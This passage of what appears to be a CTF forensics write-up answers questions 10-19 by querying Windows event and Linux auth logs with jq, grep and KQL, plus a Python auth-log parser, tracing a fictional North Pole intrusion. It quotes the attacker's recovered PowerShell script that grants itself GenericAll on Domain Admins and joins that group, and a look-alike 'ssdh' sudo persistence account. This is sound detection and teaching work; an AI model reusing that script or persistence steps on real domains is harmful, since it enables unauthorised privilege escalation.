[2024-09-15 10:42:00: 10220 772] C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4163_none_7e304ec47c735f2e\TiWorker.exe -Embedding
[2024-09-15 10:42:37: 9848 1256] taskhostw.exe -RegisterDevice -ProtectionStateChanged -FreeNetworkOnly
[2024-09-15 10:42:37: 532 772] C:\Windows\System32\smartscreen.exe -Embedding
[2024-09-15 10:43:33: 9292 1256] "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ua /installsource scheduler
[2024-09-15 10:44:09: 8220 608] powershell.exe
[2024-09-15 10:44:15: 2932 8220] "C:\Windows\system32\ipconfig.exe"
[2024-09-15 10:44:33: 9240 1256] "gpupdate.exe" /target:computer
[2024-09-15 10:45:37: 5748 772] C:\Windows\System32\mousocoreworker.exe -Embedding
[2024-09-15 10:45:37: 1108 628] C:\Windows\servicing\TrustedInstaller.exe
[2024-09-15 10:45:37: 7004 772] C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4163_none_7e304ec47c735f2e\TiWorker.exe -Embedding
[2024-09-15 10:46:27: 4412 8024] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5068,i,6610646538386684154,15194029041574557616,262144 --variations-seed-version --mojo-platform-channel-handle=4992 /prefetch:8
[2024-09-15 10:46:33: 8064 8024] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5032,i,6610646538386684154,15194029041574557616,262144 --variations-seed-version --mojo-platform-channel-handle=4868 /prefetch:8
[2024-09-15 10:49:40: 8364 1256] "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ua /installsource scheduler
[2024-09-15 10:50:02: 836 1256] "gpupdate.exe" /target:user
[2024-09-15 10:50:02: 8240 628] C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
[2024-09-16 11:00:21: 9896 628] C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
[2024-09-16 11:04:24: 9284 8024] "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5036,i,6610646538386684154,15194029041574557616,262144 --variations-seed-version --mojo-platform-channel-handle=4860 /prefetch:8
[2024-09-16 11:15:21: 7752 628] C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
[2024-09-16 11:27:22: 7936 628] C:\Windows\ZiyfDiiO.exe
[2024-09-16 11:27:22: 532 7936] powershell.exe
[2024-09-16 11:27:36: 2280 532] "C:\Windows\system32\whoami.exe"
[2024-09-16 11:28:16: 9844 628] C:\Windows\YdTRctss.exe
[2024-09-16 11:28:16: 928 7936] powershell.exe
[2024-09-16 11:30:21: 6304 628] C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
[2024-09-16 11:43:32: 9752 1256] "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /ua /installsource scheduler
[2024-09-16 11:45:21: 7668 628] C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
[2024-09-16 11:45:38: 3940 772] C:\Windows\System32\mousocoreworker.exe -Embedding
[2024-09-16 11:49:40: 8780 1256] "C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ua /installsource scheduler

The question doesn’t say whether the attacker was actually able to read the file, so I’ll start with event ID 4663, An attempt was made to access an object, filtered to the ProcessID identified above:

oxdf@hacky$ cat WindowsEvent.log | grep 'SleighRider' | cut -d' ' -f8- | jq '. | select(.EventID == 4663 and .ProcessID == 10014)'
{
  "EventTime": "2024-09-16 10:45:48",
  "Hostname": "SleighRider.northpole.local",
  "Keywords": -9223372036854775808,
  "EventType": "AUDIT_SUCCESS",
  "SeverityValue": 4,
  "Severity": "INFO",
  "EventID": 4663,
  "SourceName": "Microsoft-Windows-Security-Auditing",
  "ProviderGuid": "{54849625-5478-4994-A5BA-3E3B0328C30D}",
  "Version": 1,
  "Task": 12800,
  "OpcodeValue": 0,
  "RecordNumber": 123456,
  "ProcessID": 10014,
  "ThreadID": 6340,
  "Channel": "Security",
  "Domain": "NT AUTHORITY",
  "AccountName": "SYSTEM",
  "UserID": "S-1-5-18",
  "AccountType": "User",
  "Category": "Object Access",
  "Opcode": "Info",
  "UtcTime": "2024-09-16T10:45:48-04:00",
  "ProcessGuid": "{face0b26-426e-660c-eb0f-000000000700}",
  "ProcessName": "C:\\Users\\elf_user02\\Downloads\\howtosavexmas\\howtosavexmas.pdf.exe",
  "ObjectServer": "Security",
  "ObjectType": "File",
  "ObjectName": "C:\\Users\\elf_user02\\Desktop\\kkringl315@10.12.25.24.pem",
  "HandleID": "0x3fc",
  "Accesses": "READ_CONTROL,SYNCHRONIZE,ReadData",
  "AccessMask": "0x120089",
  "EventReceivedTime": "2024-09-16T10:45:48-04:00",
  "SourceModuleName": "inSecurity",
  "SourceModuleType": "im_msvistalog"
}

The record is an AUDIT_SUCCESS with ReadData in Accesses, so the read went through, and ProcessName ties it to howtosavexmas.pdf.exe directly rather than to one of its PowerShell children. I can find this with KQL as well:

image-20250103104905578

Answer: C:\Users\elf_user02\Desktop\kkringl315@10.12.25.24.pem

Questions 11-15

Question 11

The attacker attempted to use a secure protocol to connect to a remote system. What is the hostname of the target server?

The file accessed in Question 10 is a .pem private key, and if the filename is meaningful, it’s a key for the user kkringl315 on 10.12.25.24. I’ll look in the auth logs for that IP:

oxdf@hacky$ cat AuthLog.log | grep 10.12.25.24
<134>1 2024-09-15T06:55:21-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-15T09:55:21.345567-04:00", "hostname": "kringleSSleigH", "service": "sshd[6005]:", "message": "Connection from 34.30.110.62 port 39720 on 10.12.25.24 port 22 rdomain \"\""}
<134>1 2024-09-15T06:55:23-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-15T09:55:23.345567-04:00", "hostname": "kringleSSleigH", "service": "sshd[6006]:", "message": "Connection from 34.30.110.62 port 39721 on 10.12.25.24 port 22 rdomain \"\""}
<134>1 2024-09-15T06:55:25-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-15T09:55:25.345567-04:00", "hostname": "kringleSSleigH", "service": "sshd[6007]:", "message": "Connection from 34.30.110.62 port 39722 on 10.12.25.24 port 22 rdomain \"\""}
<134>1 2024-09-15T06:55:27-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-15T09:55:27.345567-04:00", "hostname": "kringleSSleigH", "service": "sshd[6008]:", "message": "Connection from 34.30.110.62 port 39723 on 10.12.25.24 port 22 rdomain \"\""}
<134>1 2024-09-15T06:55:29-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-15T09:55:29.345567-04:00", "hostname": "kringleSSleigH", "service": "sshd[6009]:", "message": "Connection from 34.30.110.62 port 39724 on 10.12.25.24 port 22 rdomain \"\""}
<134>1 2024-09-15T06:55:31-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-15T09:55:31.345567-04:00", "hostname": "kringleSSleigH", "service": "sshd[6010]:", "message": "Connection from 34.30.110.62 port 39725 on 10.12.25.24 port 22 rdomain \"\""}
<134>1 2024-09-15T06:55:33-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-15T09:55:33.345567-04:00", "hostname": "kringleSSleigH", "service": "sshd[6011]:", "message": "Connection from 34.30.110.62 port 39726 on 10.12.25.24 port 22 rdomain \"\""}
<134>1 2024-09-15T06:55:35-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-15T09:55:35.345567-04:00", "hostname": "kringleSSleigH", "service": "sshd[6012]:", "message": "Connection from 34.30.110.62 port 39727 on 10.12.25.24 port 22 rdomain \"\""}
<134>1 2024-09-15T06:55:37-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-15T09:55:37.345567-04:00", "hostname": "kringleSSleigH", "service": "sshd[6013]:", "message": "Connection from 34.30.110.62 port 39728 on 10.12.25.24 port 22 rdomain \"\""}
<134>1 2024-09-15T10:50:21-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-15T13:50:21.450567-04:00", "hostname": "kringleSSleigH", "service": "sshd[6110]:", "message": "Connection from 34.30.110.62 port 39732 on 10.12.25.24 port 22 rdomain \"\""}
<134>1 2024-09-15T10:51:33-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-15T13:51:33.245567-04:00", "hostname": "kringleSSleigH", "service": "sshd[6115]:", "message": "Connection from 34.30.110.62 port 39733 on 10.12.25.24 port 22 rdomain \"\""}
<134>1 2024-09-15T10:55:21-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-15T13:55:21.345567-04:00", "hostname": "kringleSSleigH", "service": "sshd[6125]:", "message": "Connection from 34.30.110.62 port 41606 on 10.12.25.24 port 22 rdomain \"\""}
<134>1 2024-09-16T11:03:06-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-16T14:03:06.315201-04:00", "hostname": "kringleSSleigH", "service": "sshd[6301]:", "message": "Connection from 34.30.110.62 port 58634 on 10.12.25.24 port 802 rdomain \"\""}
<134>1 2024-09-16T11:05:57-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-16T14:05:57.781687-04:00", "hostname": "kringleSSleigH", "service": "sshd[6425]:", "message": "Connection from 34.30.110.62 port 48202 on 10.12.25.24 port 802 rdomain \"\""}

The connections are coming from 34.30.110.62, the IP involved in the phish. Two things worth noting for later: each line carries two timestamps three hours apart (the syslog header and the JSON payload, both labelled -04:00), so pick one deliberately before lining these up against the Windows events, and the last two connections land on port 802 rather than 22.

Answer: kringleSSleigH

Question 12

The attacker created an account to establish their persistence on the Linux host. What is the name of the new account created by the attacker?

grep is very useful here as well, as I can look for the term “new” and find two logs for a new group and a new user on kringleSSleigH after the connection:

oxdf@hacky$ cat AuthLog.log | grep new
<134>1 2024-09-16T10:59:46-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-16T13:59:46.094499-04:00", "hostname": "kringleSSleigH", "service": "groupadd[6201]:", "message": "new group: name=ssdh, GID=1002"}
<134>1 2024-09-16T10:59:46-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-16T13:59:46.121497-04:00", "hostname": "kringleSSleigH", "service": "useradd[6207]:", "message": "new user: name=ssdh, UID=1002, GID=1002, home=/home/ssdh, shell=/bin/bash, from=/dev/pts/6"}

The user name is ssdh, meant to look like sshd.

Answer: ssdh

Question 13

The attacker wanted to maintain persistence on the Linux host they gained access to and executed multiple binaries to achieve their goal. What was the full CLI syntax of the binary the attacker executed after they created the new user account?

I’ll look for activity involving the ssdh user:

oxdf@hacky$ cat AuthLog.log | grep ssdh
<134>1 2024-09-16T10:59:45-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-16T13:59:45.985591-04:00", "hostname": "kringleSSleigH", "service": "sudo:", "message": " kkringl315 : TTY=pts/5 ; PWD=/opt ; USER=root ; COMMAND=/usr/sbin/adduser ssdh"}
<134>1 2024-09-16T10:59:46-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-16T13:59:46.088219-04:00", "hostname": "kringleSSleigH", "service": "groupadd[6201]:", "message": "group added to /etc/group: name=ssdh, GID=1002"}
<134>1 2024-09-16T10:59:46-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-16T13:59:46.092365-04:00", "hostname": "kringleSSleigH", "service": "groupadd[6201]:", "message": "group added to /etc/gshadow: name=ssdh"}
<134>1 2024-09-16T10:59:46-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-16T13:59:46.094499-04:00", "hostname": "kringleSSleigH", "service": "groupadd[6201]:", "message": "new group: name=ssdh, GID=1002"}
<134>1 2024-09-16T10:59:46-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-16T13:59:46.121497-04:00", "hostname": "kringleSSleigH", "service": "useradd[6207]:", "message": "new user: name=ssdh, UID=1002, GID=1002, home=/home/ssdh, shell=/bin/bash, from=/dev/pts/6"}
<134>1 2024-09-16T10:59:48-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-16T13:59:48.583517-04:00", "hostname": "kringleSSleigH", "service": "passwd[6216]:", "message": "pam_unix(passwd:chauthtok): password changed for ssdh"}
<134>1 2024-09-16T10:59:50-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-16T13:59:50.560276-04:00", "hostname": "kringleSSleigH", "service": "chfn[6221]:", "message": "changed user 'ssdh' information"}
<134>1 2024-09-16T10:59:52-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-16T13:59:52.011557-04:00", "hostname": "kringleSSleigH", "service": "gpasswd[6236]:", "message": "members of group users set by root to kkringl315,pmacct,ssdh"}
<134>1 2024-09-16T11:00:14-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-16T14:00:14.317262-04:00", "hostname": "kringleSSleigH", "service": "sudo:", "message": " kkringl315 : TTY=pts/5 ; PWD=/opt ; USER=root ; COMMAND=/usr/sbin/usermod -a -G sudo ssdh"}
<134>1 2024-09-16T11:00:14-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-16T14:00:14.334393-04:00", "hostname": "kringleSSleigH", "service": "usermod[6263]:", "message": "add 'ssdh' to group 'sudo'"}
<134>1 2024-09-16T11:00:14-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-16T14:00:14.334752-04:00", "hostname": "kringleSSleigH", "service": "usermod[6263]:", "message": "add 'ssdh' to shadow group 'sudo'"}

The user is added to a few groups; the sudo-logged command right after the creation, at 14:00:14, is /usr/sbin/usermod -a -G sudo ssdh, which puts the new account in the sudo group. The adduser call at 13:59:45 comes before the account exists, so it isn’t the one the question asks for.
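The Question 12 and 13 logic in one place, as an added example (not code from the original writeup): a parser for the AuthLog.log line shape above (RFC 5424-style header followed by a JSON payload) that keeps both timestamps, pulls the accounts created by useradd, and then returns the sudo commands naming that account that were logged after its creation, so the earlier adduser call is excluded by ordering rather than by eye. The sample lines are constructed for the example, copied in shape from the records quoted above, with one invented sudo entry at the end that should not be reported because it doesn’t touch the new account.

```python
import json
import re
from dataclasses import dataclass
from datetime import datetime

# Constructed sample, shaped like the AuthLog.log lines above: an RFC 5424-style
# header, then a JSON payload carrying the actual auth message. The last line is
# an extra, invented sudo entry to show that unrelated commands are not reported.
SAMPLE_AUTHLOG = r'''
<134>1 2024-09-16T10:59:45-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-16T13:59:45.985591-04:00", "hostname": "kringleSSleigH", "service": "sudo:", "message": " kkringl315 : TTY=pts/5 ; PWD=/opt ; USER=root ; COMMAND=/usr/sbin/adduser ssdh"}
<134>1 2024-09-16T10:59:46-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-16T13:59:46.094499-04:00", "hostname": "kringleSSleigH", "service": "groupadd[6201]:", "message": "new group: name=ssdh, GID=1002"}
<134>1 2024-09-16T10:59:46-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-16T13:59:46.121497-04:00", "hostname": "kringleSSleigH", "service": "useradd[6207]:", "message": "new user: name=ssdh, UID=1002, GID=1002, home=/home/ssdh, shell=/bin/bash, from=/dev/pts/6"}
<134>1 2024-09-16T10:59:48-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-16T13:59:48.583517-04:00", "hostname": "kringleSSleigH", "service": "passwd[6216]:", "message": "pam_unix(passwd:chauthtok): password changed for ssdh"}
<134>1 2024-09-16T11:00:14-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-16T14:00:14.317262-04:00", "hostname": "kringleSSleigH", "service": "sudo:", "message": " kkringl315 : TTY=pts/5 ; PWD=/opt ; USER=root ; COMMAND=/usr/sbin/usermod -a -G sudo ssdh"}
<134>1 2024-09-16T11:00:14-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-16T14:00:14.334393-04:00", "hostname": "kringleSSleigH", "service": "usermod[6263]:", "message": "add 'ssdh' to group 'sudo'"}
<134>1 2024-09-16T11:02:30-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-16T14:02:30.000000-04:00", "hostname": "kringleSSleigH", "service": "sudo:", "message": " kkringl315 : TTY=pts/5 ; PWD=/opt ; USER=root ; COMMAND=/usr/bin/systemctl restart ssh"}
'''

# <PRI>1 TIMESTAMP HOST APP PROCID MSGID SD {json}
HEADER = re.compile(
    r'^<(?P<pri>\d+)>1 (?P<ts>\S+) (?P<host>\S+) (?P<app>\S+) \S+ \S+ \S+ (?P<payload>\{.*\})$'
)
NEW_USER = re.compile(r'^new user: name=(?P<name>[^,]+), UID=(?P<uid>\d+), GID=(?P<gid>\d+)')
SUDO_CMD = re.compile(r'^\s*(?P<actor>\S+) : .*?USER=(?P<target>\S+) ; COMMAND=(?P<cmd>.*)$')


@dataclass
class AuthEvent:
    header_time: datetime   # syslog header timestamp
    event_time: datetime    # timestamp inside the JSON payload (sub-second)
    host: str
    service: str            # "useradd[6207]", "sudo", ...
    message: str


def parse_authlog(text: str) -> list[AuthEvent]:
    """Parse header + JSON lines; lines in another shape are skipped, not fatal."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        m = HEADER.match(line) if line else None
        if not m:
            continue
        payload = json.loads(m.group("payload"))
        events.append(AuthEvent(
            header_time=datetime.fromisoformat(m.group("ts")),
            event_time=datetime.fromisoformat(payload["timestamp"]),
            host=payload.get("hostname", m.group("host")),
            service=payload["service"].rstrip(":"),
            message=payload["message"],
        ))
    events.sort(key=lambda e: e.event_time)
    return events


def created_accounts(events: list[AuthEvent]) -> list[tuple[str, int, datetime]]:
    """(name, uid, time) for every useradd 'new user' record."""
    found = []
    for e in events:
        if e.service.startswith("useradd"):
            m = NEW_USER.match(e.message)
            if m:
                found.append((m.group("name"), int(m.group("uid")), e.event_time))
    return found


def sudo_commands_touching(events, account, after=None):
    """sudo COMMAND entries whose argv names the account, optionally only after a time."""
    cmds = []
    for e in events:
        if not e.service.startswith("sudo") or (after and e.event_time <= after):
            continue
        m = SUDO_CMD.match(e.message)
        if m and account in m.group("cmd").split():
            cmds.append((e.event_time, m.group("actor"), m.group("cmd")))
    return cmds


def persistence_timeline(text: str) -> list[dict]:
    """For each created account: when, and which sudo commands touched it afterwards."""
    events = parse_authlog(text)
    out = []
    for name, uid, created in created_accounts(events):
        following = sudo_commands_touching(events, name, after=created)
        out.append({"account": name, "uid": uid, "created": created,
                    "next_command": following[0][2] if following else None,
                    "all_commands": [c for _, _, c in following]})
    return out


if __name__ == "__main__":
    for row in persistence_timeline(SAMPLE_AUTHLOG):
        print(row)
```

The example orders on the JSON timestamp because it has sub-second precision; the parser keeps the header time too, since the three-hour gap between the two is something to settle before these events go on a timeline next to the Windows logs.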

Answer: /usr/sbin/usermod -a -G sudo ssdh

Question 14

The attacker enumerated Active Directory using a well known tool to map our Active Directory domain over LDAP. Submit the full ISO8601 compliant timestamp when the first request of the data collection attack sequence was initially recorded against the domain controller.

Directory Service event 2889 records LDAP binds that are either unsigned SASL binds or simple binds over a cleartext connection; it is normally only emitted once the LDAP Interface Events diagnostic level is raised on the domain controller. To find the first one, I’ll use head:

oxdf@hacky$ cat WindowsEvent.log | grep ' 2889,' | cut -d' ' -f8- | jq -c '. | select(.EventID == 2889)' | head -1 | jq .
{
  "LogName": "Directory Service",
  "Source": "Microsoft-Windows-ActiveDirectory_DomainService",
  "EventID": 2889,
  "Category": "LDAP Interface",
  "Level": "Information",
  "Keywords": "Classic",
  "Description": "The following client performed a SASL (Negotiate/Kerberos/NTLM/Digest) LDAP bind without requesting signing (integrity verification), or performed a simple bind over a clear text (non-SSL/TLS-encrypted) LDAP connection.",
  "Computer": "dc01.northpole.local",
  "ClientIPaddress": "172.24.25.22:18598",
  "ServicePort": 389,
  "ServiceName": "dc01.northpole.local",
  "ServiceIpAddress": "172.24.25.153",
  "UserID": "elf_user@northpole.local",
  "BindType": "0 - Simple Bind that does not support signing",
  "Date": "2024-09-16T11:10:12-04:00"
}

I could also find that with KQL: event_source: "WindowsEvent" and event.EventID: 2889. The first log has a timestamp I’ll have to convert back to ISO8601:

image-20250103110511713

Answer: 2024-09-16T11:10:12-04:00

Question 15

The attacker attempted to perform an ADCS ESC1 attack, but certificate services denied their certificate request. Submit the name of the software responsible for preventing this initial attack.

Event ID 4888 is Certificate Services denied a certificate request. KQL of event_source: "WindowsEvent" and event.EventID: 4888 finds one event:

image-20250103110710137

jq locates the same record:

oxdf@hacky$ cat WindowsEvent.log | grep ' 4888,' | cut -d' ' -f8- | jq '. | select(.EventID == 4888)'
{
  "LogName": "Security",
  "Source": "Microsoft-Windows-Security-Auditing",
  "Date": "2024-09-16T11:14:12-04:00",
  "EventID": 4888,
  "Category": "Certification Services - Certificate Request Denied",
  "Level": "Information",
  "Keywords": "Audit Failure",
  "User": "N/A",
  "Computer": "dc01.northpole.local",
  "Description": "A certificate request was made for a certificate template, but the request was denied because it did not meet the criteria.",
  "UserInformation_UserName": "elf_user@northpole.local",
  "CertificateInformation_CertificateAuthority": "elf-dc01-SeaA",
  "CertificateInformation_RequestedTemplate": "Administrator",
  "ReasonForRejection": "KringleGuard EDR flagged the certificate request.",
  "AdditionalInformation_RequesterComputer": "10.12.25.24",
  "AdditionalInformation_RequestedUPN": "administrator@northpole.local"
}

Answer: KringleGuard

Questions 16-20

Question 16

We think the attacker successfully performed an ADCS ESC1 attack. Can you find the name of the user they successfully requested a certificate on behalf of?

Event ID 4886 is Certificate Services received a certificate request, and there’s one of these:

oxdf@hacky$ cat WindowsEvent.log | grep ' 4886,' | cut -d' ' -f8- | jq '. | select(.EventID == 4886)'
{
  "LogName": "Security",
  "Source": "Microsoft-Windows-Security-Auditing",
  "Date": "2024-09-16T11:15:12-04:00",
  "EventID": 4886,
  "Category": "Certification Services - Certificate Issuance",
  "Level": "Information",
  "Keywords": "Audit Success",
  "User": "N/A",
  "Computer": "dc01.northpole.local",
  "Description": "A certificate was issued to a user.",
  "UserInformation_UserName": "elf_user@northpole.local",
  "UserInformation_UPN": "nutcrakr@northpole.local",
  "CertificateInformation_CertificateAuthority": "elf-dc01-SeaA",
  "CertificateInformation_CertificateTemplate": "ElfUsers",
  "AdditionalInformation_RequesterComputer": "10.12.25.24",
  "AdditionalInformation_CallerComputer": "172.24.25.153"
}

It’s in ELK as well with event_source: "WindowsEvent" and event.EventID: 4886:

image-20250103111033929

The UserInformation_UPN is the user for whom the certificate was requested.

Answer: nutcrakr

Question 17

One of our file shares was accessed by the attacker using the elevated user account (from the ADCS attack). Submit the folder name of the share they accessed.

Event ID 5140 is A network share object was accessed. I’ll search for that along with the nutcrakr user using event_source: "WindowsEvent" and event.EventID: 5140 and event.SubjectUserName: nutcrakr:

image-20250103111341452

This returns seven logs. I can step through those, or see that the share name is held in event.ShareInformation_ShareName, and add that as a column from the left side:

image-20250103111857462

Or, I could look from the terminal:

oxdf@hacky$ cat WindowsEvent.log | grep nutcrakr | cut -d' ' -f8- | jq -c '. | select(.EventID == 5140 and .SubjectUserName == "nutcrakr") | "[\(.EventTime)] \(.ShareInformation_SharePath)"'
"[2024-09-16 11:18:43] \\??\\C:\\WishLists"
"[2024-09-16 11:35:58] \\??\\C:\\Windows\\SYSVOL\\sysvol"
"[2024-09-16 11:35:59] null"
"[2024-09-16 11:44:40] \\??\\C:\\Windows"
"[2024-09-16 11:44:40] \\??\\C:\\Windows"
"[2024-09-16 11:46:17] \\??\\C:\\Windows"
"[2024-09-16 11:53:12] \\??\\C:\\Windows\\SYSVOL\\sysvol"

The interesting one is the first one, WishLists.

Answer: WishLists

Question 18

The naughty attacker continued to use their privileged account to execute a PowerShell script to gain domain administrative privileges. What is the password for the account the attacker used in their attack payload?

I’ll take a look at the 4104 (PowerShell script block logging) events. There’s only one with nutcrakr in it:

oxdf@hacky$ cat WindowsEvent.log | grep nutcrakr | cut -d' ' -f8- | jq -c '. | select(.EventID == 4104)' | jq .
{
  "MessageNumber": 1,
  "MessageTotal": 1,
  "ScriptBlockText": "Add-Type -AssemblyName System.DirectoryServices\n$ldapConnString = \"LDAP://CN=Domain Admins,CN=Users,DC=northpole,DC=local\"\n$username = \"nutcrakr\"\n$pswd = 'fR0s3nF1@k3_s'\n$nullGUID = [guid]'00000000-0000-0000-0000-000000000000'\n$propGUID = [guid]'00000000-0000-0000-0000-000000000000'\n$IdentityReference = (New-Object System.Security.Principal.NTAccount(\"northpole.local\\$username\")).Translate([System.Security.Principal.SecurityIdentifier])\n$inheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance]::None\n$ACE = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $IdentityReference, ([System.DirectoryServices.ActiveDirectoryRights] \"GenericAll\"), ([System.Security.AccessControl.AccessControlType] \"Allow\"), $propGUID, $inheritanceType, $nullGUID\n$domainDirEntry = New-Object System.DirectoryServices.DirectoryEntry $ldapConnString, $username, $pswd\n$secOptions = $domainDirEntry.get_Options()\n$secOptions.SecurityMasks = [System.DirectoryServices.SecurityMasks]::Dacl\n$domainDirEntry.RefreshCache()\n$domainDirEntry.get_ObjectSecurity().AddAccessRule($ACE)\n$domainDirEntry.CommitChanges()\n$domainDirEntry.dispose()\n$ldapConnString = \"LDAP://CN=Domain Admins,CN=Users,DC=northpole,DC=local\"\n$domainDirEntry = New-Object System.DirectoryServices.DirectoryEntry $ldapConnString, $username, $pswd\n$user = New-Object System.Security.Principal.NTAccount(\"northpole.local\\$username\")\n$sid=$user.Translate([System.Security.Principal.SecurityIdentifier])\n$b=New-Object byte[] $sid.BinaryLength\n$sid.GetBinaryForm($b,0)\n$hexSID=[BitConverter]::ToString($b).Replace('-','')\n$domainDirEntry.Add(\"LDAP://<SID=$hexSID>\")\n$domainDirEntry.CommitChanges()\n$domainDirEntry.dispose()",
  "ScriptBlockId": "{01bbe2da-58c3-4490-aa52-682dbae233a3}",
  "Path": "",
  "Provider_Name": "Microsoft-Windows-PowerShell",
  "Provider_Guid": "{a0c1853b-5c40-4b15-8766-3cf1c58f985a}",
  "EventID": 4104,
  "Version": 1,
  "Level": 5,
  "Task": 2,
  "Opcode": 15,
  "Keywords": "0x0",
  "TimeCreated_SystemTime": "2024-09-16T11:33:12-04:00",
  "EventRecordID": 54059,
  "Correlation_ActivityID": "{17aa0df9-5d3d-46e9-bce0-55b7a5be4b43}",
  "ParentProcessID": 928,
  "ThreadID": 4896,
  "Channel": "Microsoft-Windows-PowerShell/Operational",
  "Computer": "SleighRider.northpole.local",
  "Security_UserID": "S-1-5-21-3699322559-1991583901-1175093138-1110"
}

The script is:

Add-Type -AssemblyName System.DirectoryServices
$ldapConnString = "LDAP://CN=Domain Admins,CN=Users,DC=northpole,DC=local"
$username = "nutcrakr"
$pswd = 'fR0s3nF1@k3_s'
$nullGUID = [guid]'00000000-0000-0000-0000-000000000000'
$propGUID = [guid]'00000000-0000-0000-0000-000000000000'
$IdentityReference = (New-Object System.Security.Principal.NTAccount("northpole.local\$username")).Translate([System.Security.Principal.SecurityIdentifier])
$inheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance]::None
$ACE = New-Object System.DirectoryServices.ActiveDirectoryAccessRule $IdentityReference, ([System.DirectoryServices.ActiveDirectoryRights] "GenericAll"), ([System.Security.AccessControl.AccessControlType] "Allow"), $propGUID, $inheritanceType, $nullGUID
$domainDirEntry = New-Object System.DirectoryServices.DirectoryEntry $ldapConnString, $username, $pswd
$secOptions = $domainDirEntry.get_Options()
$secOptions.SecurityMasks = [System.DirectoryServices.SecurityMasks]::Dacl
$domainDirEntry.RefreshCache()
$domainDirEntry.get_ObjectSecurity().AddAccessRule($ACE)
$domainDirEntry.CommitChanges()
$domainDirEntry.dispose()
$ldapConnString = "LDAP://CN=Domain Admins,CN=Users,DC=northpole,DC=local"
$domainDirEntry = New-Object System.DirectoryServices.DirectoryEntry $ldapConnString, $username, $pswd
$user = New-Object System.Security.Principal.NTAccount("northpole.local\$username")
$sid=$user.Translate([System.Security.Principal.SecurityIdentifier])
$b=New-Object byte[] $sid.BinaryLength
$sid.GetBinaryForm($b,0)
$hexSID=[BitConverter]::ToString($b).Replace('-','')
$domainDirEntry.Add("LDAP://<SID=$hexSID>")
$domainDirEntry.CommitChanges()
$domainDirEntry.dispose()

It’s using the password “fR0s3nF1@k3_s” to connect to AD and make changes.

Answer: fR0s3nF1@k3_s

Question 19

The attacker then used remote desktop to remotely access one of our domain computers. What is the full ISO8601 compliant UTC EventTime when they established this connection?

Successful logons are logged as event 4624, which includes a Logon Type; type 10 is RemoteInteractive, which is what RDP connections produce. Searching for those, there’s one:

oxdf@hacky$ cat WindowsEvent.log | grep ' 4624,' | cut -d' ' -f8- | jq -c '. | select(.EventID == 4624 and .LogonInformation_LogonType == 10)' | jq .
{
  "EventTime": "2024-09-16 11:35:57",
  "Hostname": "dc01.northpole.local",
  "Keywords": -9214364837600034816,
  "EventType": "AUDIT_SUCCESS",
  "SeverityValue": 2,
  "Severity": "INFO",
  "EventID": 4624,
  "SourceName": "Microsoft-Windows-Security-Auditing",
  "ProviderGuid": "{54849625-5478-4994-A5BA-3E3B0328C30D}",
  "Version": 2,
  "Task": 12544,
  "OpcodeValue": 0,
  "RecordNumber": 530313,
  "ActivityID": "{D72392BD-843F-0000-1F93-23D73F84DA01}",
  "ProcessID": 704,
  "ThreadID": 1124,
  "Channel": "Security",
  "Category": "Logon",
  "Opcode": "Info",
